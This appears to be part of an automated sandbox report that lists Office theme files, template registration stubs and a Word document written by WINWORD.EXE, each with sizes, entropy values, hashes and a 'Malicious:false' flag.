                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):562113
                                    Entropy (8bit):7.67409707491542
                                    Encrypted:false
                                    SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                    MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                    SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                    SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                    SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.535736910133401
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                    MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                    SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                    SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                    SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                    Malicious:false
                                    Preview:[File] | OriginalName: Banded.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):608122
                                    Entropy (8bit):7.729143855239127
                                    Encrypted:false
                                    SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                    MD5:8BA551EEC497947FC39D1D48EC868B54
                                    SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                    SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                    SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.516359852766808
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                    MD5:960E28B1E0AB3522A8A8558C02694ECF
                                    SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                    SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                    SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                    Malicious:false
                                    Preview:[File] | OriginalName: Parcel.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):924687
                                    Entropy (8bit):7.824849396154325
                                    Encrypted:false
                                    SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                    MD5:97EEC245165F2296139EF8D4D43BBB66
                                    SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                    SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                    SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):282
                                    Entropy (8bit):3.51145753448333
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                    MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                    SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                    SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                    SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                    Malicious:false
                                    Preview:[File] | OriginalName: Parallax.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):966946
                                    Entropy (8bit):7.8785200658952
                                    Encrypted:false
                                    SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                    MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                    SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                    SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                    SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):282
                                    Entropy (8bit):3.5323495192404475
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                    MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                    SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                    SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                    SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                    Malicious:false
                                    Preview:[File] | OriginalName: Quotable.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1649585
                                    Entropy (8bit):7.875240099125746
                                    Encrypted:false
                                    SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                    MD5:35200E94CEB3BB7A8B34B4E93E039023
                                    SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                    SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                    SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):284
                                    Entropy (8bit):3.5552837910707304
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                    MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                    SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                    SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                    SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                    Malicious:false
                                    Preview:[File] | OriginalName: Wood_Type.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):976001
                                    Entropy (8bit):7.791956689344336
                                    Encrypted:false
                                    SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                    MD5:9E563D44C28B9632A7CF4BD046161994
                                    SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                    SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                    SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.5270134268591966
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                    MD5:327DA4A5C757C0F1449976BE82653129
                                    SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                    SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                    SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                    Malicious:false
                                    Preview:[File] | OriginalName: Berlin.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1750795
                                    Entropy (8bit):7.892395931401988
                                    Encrypted:false
                                    SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                    MD5:529795E0B55926752462CBF32C14E738
                                    SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                    SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                    SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.528155916440219
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                    MD5:AA7B919B21FD42C457948DE1E2988CB3
                                    SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                    SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                    SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                    Malicious:false
                                    Preview:[File] | OriginalName: Droplet.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1091485
                                    Entropy (8bit):7.906659368807194
                                    Encrypted:false
                                    SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                    MD5:2192871A20313BEC581B277E405C6322
                                    SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                    SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                    SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.5301133500353727
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                    MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                    SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                    SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                    SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                    Malicious:false
                                    Preview:[File] | OriginalName: Gallery.thmx | Component: PPTFiles | ReqVer: 14 | Executable: {PP} | StoreLocation: {My Templates} | Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1204049
                                    Entropy (8bit):7.92476783994848
                                    Encrypted:false
                                    SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                    MD5:FD5BBC58056522847B3B75750603DF0C
                                    SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                    SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                    SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):276
                                    Entropy (8bit):3.5364757859412563
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                    MD5:CD465E8DA15E26569897213CA9F6BC9C
                                    SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                    SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                    SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                    Malicious:false
                                    Preview:[File] OriginalName: Savon.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):1463634
                                    Entropy (8bit):7.898382456989258
                                    Encrypted:false
                                    SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                    MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                    SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                    SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                    SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.5286004619027067
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                    MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                    SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                    SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                    SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                    Malicious:false
                                    Preview:[File] OriginalName: Circuit.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2357051
                                    Entropy (8bit):7.929430745829162
                                    Encrypted:false
                                    SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                    MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                    SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                    SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                    SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):276
                                    Entropy (8bit):3.516423078177173
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                    MD5:5402138088A9CF0993C08A0CA81287B8
                                    SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                    SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                    SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                    Malicious:false
                                    Preview:[File] OriginalName: Slate.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2218943
                                    Entropy (8bit):7.942378408801199
                                    Encrypted:false
                                    SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                    MD5:EE33FDA08FBF10EF6450B875717F8887
                                    SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                    SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                    SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.544065206514744
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                    MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                    SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                    SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                    SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                    Malicious:false
                                    Preview:[File] OriginalName: Damask.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3078052
                                    Entropy (8bit):7.954129852655753
                                    Encrypted:false
                                    SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                    MD5:CDF98D6B111CF35576343B962EA5EEC6
                                    SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                    SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                    SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):274
                                    Entropy (8bit):3.5303110391598502
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                    MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                    SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                    SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                    SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                    Malicious:false
                                    Preview:[File] OriginalName: Mesh.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):2924237
                                    Entropy (8bit):7.970803022812704
                                    Encrypted:false
                                    SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                    MD5:5AF1581E9E055B6E323129E4B07B1A45
                                    SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                    SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                    SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):286
                                    Entropy (8bit):3.5434534344080606
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                    MD5:C9812793A4E94320C49C7CA054EE6AA4
                                    SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                    SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                    SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                    Malicious:false
                                    Preview:[File] OriginalName: Main_Event.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):3611324
                                    Entropy (8bit):7.965784120725206
                                    Encrypted:false
                                    SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                    MD5:FB88BFB743EEA98506536FC44B053BD0
                                    SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                    SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                    SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                    Malicious:false
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):288
                                    Entropy (8bit):3.5359188337181853
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                    MD5:0FEA64606C519B78B7A52639FEA11492
                                    SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                    SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                    SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                    Malicious:false
                                    Preview:[File] OriginalName: Vapor_Trail.thmx Component: PPTFiles ReqVer: 14 Executable: {PP} StoreLocation: {My Templates} Command: {FilePath}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):274
                                    Entropy (8bit):3.4699940532942914
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                    MD5:55BA5B2974A072B131249FD9FD42EB91
                                    SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                    SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                    SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                    Malicious:false
                                    Preview:[File] OriginalName: Insight design set.dotx Component: WordFiles ReqVer: 14 Executable: {WD} StoreLocation: {WD Document Parts}
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Word 2007+
                                    Category:modified
                                    Size (bytes):3465076
                                    Entropy (8bit):7.898517227646252
                                    Encrypted:false
                                    SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                    MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                    SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                    SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
